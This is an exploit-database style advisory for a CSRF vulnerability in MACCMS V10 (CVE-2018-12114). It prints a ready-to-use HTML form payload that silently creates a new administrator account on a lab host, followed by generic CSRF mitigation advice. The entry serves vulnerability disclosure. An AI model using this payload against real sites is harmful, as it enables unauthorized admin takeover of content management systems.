vendor:
MACCMS_V10
by:
bay0net
8.8
CVSS
HIGH
CSRF
352
CWE
Product Name: MACCMS_V10
Affected Version From: V10
Affected Version To: V10
Patch Exists: NO
Related CWE: CVE-2018-12114
CPE: a:maccms:maccms_v10
Metasploit:
N/A
Platforms Tested: None
2018
MACCMS_V10 CSRF vulnerability add admin account
I found a CSRF vulnerability in maccms_v10,this vulnerability can be arbitrarily added to users. The payload for attack is as follows: <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://10.211.55.17/maccms10/admin.php/admin/admin/info.html" method="POST"> <input type="hidden" name="admin_id" value="" /> <input type="hidden" name="admin_name" value="test2" /> <input type="hidden" name="admin_pwd" value="test2" /> <input type="hidden" name="admin_status" value="1" /> <input type="hidden" name="admin_auth[0]" value="index/welcome" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Mitigation:
The best way to mitigate CSRF attacks is to use a combination of both server-side and client-side security measures. Server-side measures include using a unique token for each request, which is validated on the server. Client-side measures include using a same-site cookie flag, which prevents the cookie from being sent in cross-site requests.